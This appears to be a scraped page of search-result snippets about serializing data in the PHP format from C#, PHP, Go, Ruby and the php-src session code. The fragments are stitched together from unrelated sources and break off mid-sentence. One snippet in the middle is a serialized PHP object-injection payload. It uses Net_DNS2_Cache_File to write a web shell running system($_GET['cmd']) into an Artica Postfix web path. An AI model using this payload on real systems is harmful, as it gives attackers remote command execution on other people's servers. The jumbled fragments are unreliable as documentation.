Ruby 版本: Flash/Actionscript 版本: C# 版本:
ArrayList al = (ArrayList)serializer.Deserialize(Str); for(inti = 0; i < al.Count; i++) { Hashtable ht = (Hashtable)al[i]; //do something } //C#反序列化单维数组的例子 ArrayList al = (ArrayList)serializer.Deserialize(Str); for(inti = 0; i < al.Count; i++) { Hashtable ht ...
反之,如果序列化时,使用Object serializer产生的结果是O格式。 但是根据他提供的demo并不能生成C格式的结果。 个人认为C格式的意思应该是Customized serializing。 经过尝试,最后通过Serializable接口生成C格式结果。 The Serializable interface php官方文档解释: 用来自定义序列化的接口,php提供了serializable接口,以实现更加...
Ruby 版本: Flash/Actionscript 版本: C# 版本:
Python 版本(beta):http://hurring/code/python/serialize/ Java 版本(pre-alpha):http://hurring/code/java/serialize/ Ruby 版本: Flash/Actionscript 版本: C# 版本:
Serializer for PHP Installation UseComposerto install the package: $ composer require nilportugues/serializer Introduction What is serialization? In the context of data storage, serialization is the process of translating data structures or object state into a format that can be stored (for example, ...
out, _ := serialize.UnMarshal([]byte(str)) fmt.Println(out) //map[php:世界上最好的语言] // serialize() in php jsonbyte, _ := serialize.Marshal(out) fmt.Println(string(jsonbyte)) // a:1:{s:3:"php";s:24:"世界上最好的语言";} ...
O:19:"Net_DNS2_Cache_File":4:{s:10:"cache_file";s:47:"/usr/share/artica-postfix/wizard/wiz.upload.php";s:16:"cache_serializer";s:4:"json";s:10:"cache_size";i:9999999999;s:10:"cache_data";a:1:{s:30:"<?phpsystem($_GET['cmd']); ?>";a:2:{s:10:"cache_date";i:...
ruby-2.4 Usage PhpSerializer.serialize('example') PhpSerializer.unserialize('s:7:"example";') Contributing Bug reports and pull requests are welcome on GitHub at License The gem is available as open source under the terms of the MIT License.About...
查找serializer的过程与查找PS(mod)的方式类似: if (PS(serializer) == NULL) { char *value; value = zend_ini_string("session.serialize_handler", sizeof("session.serialize_handler"), 0); if (value) { PS(serializer) = _php_find_ps_serializer(value TSRMLS_CC); ...